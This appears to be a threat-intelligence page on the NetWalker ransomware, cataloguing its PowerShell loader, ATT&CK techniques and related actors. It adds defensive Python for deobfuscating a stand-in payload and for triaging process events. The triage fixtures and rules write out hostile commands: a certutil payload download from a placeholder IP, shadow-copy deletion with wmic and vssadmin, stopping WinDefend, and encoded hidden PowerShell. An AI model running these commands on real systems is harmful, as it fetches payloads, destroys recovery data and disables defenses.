Netwalker
NetWalker is a ransomware family run as a ransomware-as-a-service (RaaS) operation and linked by the tracked sources to Circus Spider. It encrypts files on infected Windows systems to extort victims and inhibits recovery by deleting Volume Shadow Copies, so that encrypted files cannot be restored from them.

The malware has been described as written in PowerShell and executed directly in memory to avoid detection. Its PowerShell loader script stacks several layers of obfuscation (Base64, hexadecimal encoding, XOR encryption, and obfuscated function and variable names); at run time it decodes and decrypts these layers and loads the embedded NetWalker DLL from its hex representation straight into memory, without writing it to disk.

For defense evasion, NetWalker detects and terminates processes belonging to security software. It can also add a registry entry under HKEY_CURRENT_USER\SOFTWARE\{8 random characters}. Operators deploying it have used PsExec and certutil to retrieve the payload, and the malware can use WMI to delete shadow copies.

Tracked reporting also ties NetWalker campaigns to coronavirus-themed phishing lures, including attacks on hospitals in Spain, and states that NetWalker generally targeted hospitals in the U.S. and Spain. Further reporting notes NetWalker attacks exploiting CVE-2019-18935 alongside Blue Mockingbird activity, and law-enforcement disruption including the seizure of NetWalker leak and payment infrastructure in January 2021. UNC2628 is believed to have partnered with RaaS programs including NetWalker, and proceeds from NetWalker-linked activity were among the funds received by the sanctioned exchange Garantex.
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
CVE-2019-18935 (Telerik UI for ASP.NET AJAX): Versions prior to R1 2020 (2020.1.114) are susceptible to remote code execution attacks... There were two malware campaigns associated with this vulnerability: Netwalker ransomware and Blue Mockingbird Monero cryptocurrency mining.
Groups observed using it
3 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
UNC2628 is thought to partner with other RaaS services including REvil and Netwalker.
In a January 2021 thread on Exploit regarding the arrest of an affiliate for the NetWalker ransomware program and its subsequent demise, Wazawaka seems already resigned to those limitations.
Techniques & procedures
23 distinct techniques documented for this family, organized by ATT&CK tactic.
Execution
6 techniques
The content repeatedly describes threat actors and malware using WMI/WMIC/wmiexec for remote execution, lateral movement, discovery, persistence, and administrative actions; e.g., 'APT41 used WMI in several ways, including for execution of commands via WMIEXEC as well as for persistence via PowerSploit' and 'Scattered Spider used Windows Management Instrumentation (WMI) to move laterally via Impacket.'
The content repeatedly describes threat actors and malware using PowerShell scripts/commands for execution, download, staging, reconnaissance, persistence, credential access, lateral movement, and defense evasion; e.g., "Sandworm Team used PowerShell scripts to run a credential harvesting tool in memory to evade defenses."
APT1 has used the Windows command shell to execute commands, and batch scripting to automate execution. Blue Mockingbird has used batch script files to automate execution and deployment of payloads. During HomeLand Justice, threat actors used Windows batch files for persistence and execution.
Citrix ADC maintains a vulnerable Perl script (newbm.pl) that, when accessed via HTTP POST request ... allows local operating system (OS) commands to execute. Attackers can use this functionality to upload/execute command and control (C2) software ... and gain unauthorized access to the OS.
"Anchor can create and execute services to load its payload"; "APT32's backdoor has used Windows services as a way to execute its malicious payload"; "Ragnar Locker has used sc.exe to execute a service that it creates"; "Shamoon creates a new service named 'ntssrv' to execute the payload"
Persistence
1 technique
Privilege Escalation
1 technique
"APT37 leverages the Windows API calls: VirtualAlloc(), WriteProcessMemory(), and CreateRemoteThread() for process injection"; "IcedID has called ZwWriteVirtualMemory... ZwQueueApcThread... to inject itself into a remote process"; "Havoc can use NtAllocateVirtualMemory and NtCreateThreadEx to aid process injection"
Stealth
7 techniques"Action RAT's commands, strings, and domains can be Base64 encoded within the payload." / "ADVSTORESHELL... strings... encrypted with an XOR-based algorithm; some strings are also encrypted with 3DES and reversed." / "APT29 has used encoded PowerShell commands." / "APT41 used VMProtected binaries..."
"APT37 leverages the Windows API calls: VirtualAlloc(), WriteProcessMemory(), and CreateRemoteThread() for process injection"; "IcedID has called ZwWriteVirtualMemory... ZwQueueApcThread... to inject itself into a remote process"; "Havoc can use NtAllocateVirtualMemory and NtCreateThreadEx to aid process injection"
The content repeatedly describes malware and threat actors decoding, decrypting, or deobfuscating payloads, strings, configuration data, commands, and C2 traffic prior to execution or use, e.g., 'APT28 macro uses the command certutil -decode to decode contents of a .txt file storing the base64 encoded payload' and 'Action RAT can use Base64 to decode actor-controlled C2 server communications.'
“APT41 used certutil to download additional files.”; “Astaroth uses certutil and BITSAdmin to download additional malware.”; “CARROTBAT… download and execute a remote file via certutil.”; “Netwalker… used psexec and certutil to retrieve the Netwalker payload.”
"Sandworm Team used PowerShell scripts to run a credential harvesting tool in memory to evade defenses," "Deep Panda has used PowerShell scripts to download and execute programs in memory, without writing to disk," and "Turla has also used PowerShell scripts to load and execute malware in memory."
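The family summary describes the NetWalker loader as a PowerShell script that peels Base64, hex and XOR layers off an embedded DLL before loading it in memory, and the obfuscation and decoding techniques listed above are the same pattern seen across many families. The analysis script below is an added example, not NetWalker's code and not from any source the page cites: it pulls long string literals out of a script, identifies each encoding layer, recovers a repeating XOR key from the zero-heavy PE header (a generalisation beyond the single loader the text describes), and stops when an MZ/PE image falls out. The PowerShell one-liner, the stand-in DLL bytes, the variable names and the XOR key are all constructed for the demonstration; the real loader's key and layer order are not on the page.

```python
"""Peel the layered encoding described for the NetWalker PowerShell loader
(Base64 -> hex -> XOR -> embedded DLL) and recover the XOR key.
Added analysis example; not NetWalker's own code. The script text, payload
bytes, variable names and XOR key below are all constructed for the demo."""
import base64
import binascii
import re
from collections import Counter

# Constructed stand-in for the embedded DLL: DOS header with e_lfanew = 0x40,
# a PE signature and a mostly-zero body. Real PE headers are also zero-heavy,
# which is what the key recovery below relies on.
FAKE_DLL = (
    b"MZ\x90\x00" + b"\x00" * 56 + (0x40).to_bytes(4, "little")
    + b"PE\x00\x00" + b"\x00" * 128 + b"netwalker-sample-section" * 3
)
SAMPLE_KEY = b"\x37\xa9\x5c\x10"  # assumed; the real loader's key is not on the page

_B64 = re.compile(rb"^[A-Za-z0-9+/]+={0,2}$")
_HEX = re.compile(rb"^[0-9a-fA-F]+$")


def xor_bytes(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def build_sample_script(payload: bytes, key: bytes) -> str:
    """Wrap a payload the way the loader is described (XOR, then hex, then
    Base64) inside a constructed PowerShell one-liner."""
    blob = base64.b64encode(binascii.hexlify(xor_bytes(payload, key))).decode()
    return (f"$a='{blob}';"
            "$b=[Text.Encoding]::ASCII.GetString([Convert]::FromBase64String($a))")


def extract_blobs(script: str, min_len: int = 64) -> list:
    """Long single-quoted literals in the script are the candidate encoded layers."""
    return [m.encode() for m in re.findall(r"'([^']{%d,})'" % min_len, script)]


def looks_like_pe(data: bytes) -> bool:
    """MZ magic plus a PE signature at e_lfanew (offset 0x3C)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def classify(data: bytes) -> str:
    if looks_like_pe(data):
        return "pe"
    if _HEX.match(data) and len(data) % 2 == 0:   # hex is a subset of base64, test first
        return "hex"
    if _B64.match(data) and len(data) % 4 == 0:
        return "base64"
    return "unknown"


def recover_xor_key(data: bytes, max_key_len: int = 16):
    """Known-plaintext attack on repeating-key XOR: a PE image is mostly zero
    bytes, so the most frequent ciphertext byte at each key offset is the key
    byte itself. The smallest key length that yields a valid PE header wins."""
    for k in range(1, max_key_len + 1):
        key = bytes(Counter(data[i::k]).most_common(1)[0][0] for i in range(k))
        if looks_like_pe(xor_bytes(data, key)):
            return key
    return None


def peel(blob: bytes, max_layers: int = 8):
    """Strip layers until a PE image (or something unrecognised) remains.
    Returns (payload, [layer names in the order they were removed])."""
    layers, data = [], blob.strip()
    for _ in range(max_layers):
        kind = classify(data)
        if kind == "base64":
            data = base64.b64decode(data, validate=True)
        elif kind == "hex":
            data = binascii.unhexlify(data)
        elif kind == "pe":
            layers.append(kind)
            return data, layers
        else:                       # opaque bytes: try XOR with a recovered key
            key = recover_xor_key(data)
            if key is None:
                layers.append("unknown")
                return data, layers
            data, kind = xor_bytes(data, key), f"xor(key={key.hex()})"
        layers.append(kind)
    return data, layers


def analyze(script: str):
    """Return the first embedded blob that peels down to a PE image, or None."""
    for blob in extract_blobs(script):
        payload, layers = peel(blob)
        if layers and layers[-1] == "pe":
            return {"layers": layers, "size": len(payload), "payload": payload}
    return None


if __name__ == "__main__":
    found = analyze(build_sample_script(FAKE_DLL, SAMPLE_KEY))
    print(found["layers"], found["size"])   # ['base64', 'hex', 'xor(key=37a95c10)', 'pe'] 268
```

The key recovery is the part worth keeping: it works for any repeating-key XOR over a PE because the DOS stub and section padding are dominated by zero bytes, so no knowledge of the loader's decryption routine is needed. Real loaders split the blob across several variables or compute the key at run time; in that case feed `peel()` the concatenated literal, or dump the decoded string from the PowerShell host before the `Load` call.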
Defense Impairment
1 technique
Discovery
2 techniques
The content repeatedly describes malware and threat actors collecting host details such as OS version, hostname, architecture, CPU, memory, BIOS, domain, language, and other configuration data; e.g., "APT41 uses multiple built-in commands such as systeminfo and net config Workstation to enumerate victim system basic configuration information."
Lateral Movement
1 technique"PsExec ... can be used to execute binaries on remote systems using a temporary Windows service"; "RemoteCMD can execute commands remotely by creating a new service on the remote system"; "Winexe installs a service on the remote system, executes the command, then uninstalls the service"
Command and Control
1 technique
Impact
3 techniques
Ransomware is a type of malicious software designed to deny access to an information system or its resident data until a ransom is paid. The data is held for ransom through encryption... operators continue to add new twists to their methods, from deleting backup systems simultaneously to encrypting the primary data set.
Examples include 'Avaddon uses wmic.exe to delete shadow copies,' 'BlackCat can use wmic.exe to delete shadow copies on compromised networks,' and 'WannaCry utilizes wmic to delete shadow copies.'
Other
2 techniques
The content repeatedly describes threat actors and malware disabling, stopping, uninstalling, or modifying antivirus, EDR, Windows Defender, AMSI, logging, and other security controls.
Examples include 'Aquatic Panda has attempted to stop endpoint detection and response (EDR) tools', 'BlackByte disabled security tools such as Windows Defender', 'Scattered Spider has uninstalled and disabled security tools', and many malware families terminating AV/EDR processes or services.
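The technique entries above (certutil for payload retrieval or decoding, PsExec's temporary service, wmic/WMI shadow-copy deletion, encoded in-memory PowerShell, and stopping security tools) are the behaviours a SOC would actually hunt for in process-creation telemetry. The triage script below is an added example, not Mallory's rule set and not code from any source the page cites: it runs simple rules over constructed Sysmon Event ID 1 / Security 4688-style events, keys the PsExec rule on parent-process lineage rather than the command line, and ranks hosts where recovery inhibition was seen alongside other signals. The hosts, paths, addresses (198.51.100.0/24 is reserved for documentation) and command lines are constructed; the Defender service names WinDefend, Sense and WdNisSvc are real, but the list is an assumption that must be extended with your own EDR's service names.

```python
"""Triage constructed Windows process-creation events for the NetWalker
tradecraft catalogued above: shadow-copy deletion via WMIC/WMI or vssadmin,
payload retrieval or decoding with certutil, children of the PsExec service,
encoded PowerShell, and stopping security services. Added detection example;
not Mallory's or any vendor's rule set. Every host, path, address and command
line below is constructed (198.51.100.0/24 is reserved for documentation)."""
import re
from collections import defaultdict

# Constructed events carrying the fields of Sysmon Event ID 1 / Security 4688.
SAMPLE_EVENTS = [
    {"id": 1, "host": "WS-0412", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "parent": r"C:\Windows\System32\cmd.exe", "cmd": "wmic os get caption"},
    {"id": 2, "host": "WS-0412", "image": r"C:\Windows\System32\certutil.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": r"certutil -urlcache -split -f http://198.51.100.7/nw.bin C:\Users\Public\nw.bin"},
    {"id": 3, "host": "WS-0412",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"id": 4, "host": "WS-0412", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "wmic shadowcopy delete"},
    {"id": 5, "host": "SRV-FILE01", "image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\PSEXESVC.exe",
     "cmd": "cmd.exe /c vssadmin delete shadows /all /quiet"},
    {"id": 6, "host": "SRV-FILE01", "image": r"C:\Windows\System32\net.exe",
     "parent": r"C:\Windows\System32\cmd.exe", "cmd": "net stop WinDefend"},
    {"id": 7, "host": "WS-0199", "image": r"C:\Windows\System32\notepad.exe",
     "parent": r"C:\Windows\explorer.exe", "cmd": "notepad.exe notes.txt"},
]

# Command-line rules, evaluated against a whitespace-normalised, lower-cased line.
RULES = [
    ("shadow_copy_deletion",
     r"(wmic.*shadowcopy.*delete|vssadmin.*delete shadows|win32_shadowcopy.*delete)"),
    ("certutil_fetch_or_decode", r"certutil(\.exe)?.*\s-(urlcache|decode)\b"),
    ("encoded_powershell", r"powershell(\.exe)?.*\s-(e|ec|en|enc|encodedcommand)\s"),
]
# WinDefend/Sense/WdNisSvc are Microsoft Defender services. Assumption: a short
# list of security services beats alerting on every "net stop", which is noisy
# on servers; extend it with your EDR's service names.
SECURITY_SERVICES = {"windefend", "sense", "wdnissvc"}
PSEXEC_SERVICE = re.compile(r"(^|\\)psexesvc\.exe$", re.I)


def normalize(cmd: str) -> str:
    return re.sub(r"\s+", " ", cmd).strip().lower()


def match_rules(event: dict) -> list:
    """Return the names of every rule the event trips (empty list if benign)."""
    cmd = normalize(event["cmd"])
    hits = [name for name, pattern in RULES if re.search(pattern, cmd)]
    stop = re.search(r"\b(net|sc)(\.exe)? stop (\S+)", cmd)
    if stop and stop.group(3) in SECURITY_SERVICES:
        hits.append("security_service_stop")
    if PSEXEC_SERVICE.search(event["parent"]):   # lineage, not command line
        hits.append("psexec_service_child")
    return hits


def triage(events: list):
    """Flatten hits to (event id, host, rule) and summarise rules per host."""
    findings = [(e["id"], e["host"], r) for e in events for r in match_rules(e)]
    per_host = defaultdict(set)
    for _, host, rule in findings:
        per_host[host].add(rule)
    return findings, {host: sorted(rules) for host, rules in per_host.items()}


def priority_hosts(summary: dict) -> list:
    """Hosts where recovery inhibition was seen alongside any other signal;
    they are already past staging and need containment first."""
    return sorted(h for h, rules in summary.items()
                  if "shadow_copy_deletion" in rules and len(rules) > 1)


if __name__ == "__main__":
    findings, summary = triage(SAMPLE_EVENTS)
    for finding in findings:
        print(finding)
    print("contain first:", priority_hosts(summary))
```

Two design points carry over to production rules: the benign `wmic os get caption` on the same host is not flagged, because the rule keys on the `shadowcopy ... delete` arguments rather than on wmic.exe itself, and the PsExec rule fires on any child of PSEXESVC.exe regardless of what it runs, since that service is the artefact the page's lateral-movement entry describes. Shadow-copy deletion is near the end of the intrusion; a host tripping it together with the earlier staging signals belongs at the top of the queue.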
Recent activity
48 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Ransomware family referenced as a source of illicit funds laundered through Garantex.
Ransomware family whose operators’ proceeds were laundered through the Garantex cryptocurrency exchange, per the article.
Ransomware variant explicitly cited as generating proceeds laundered through Garantex.
Ransomware that deletes shadow volumes to prevent recovery.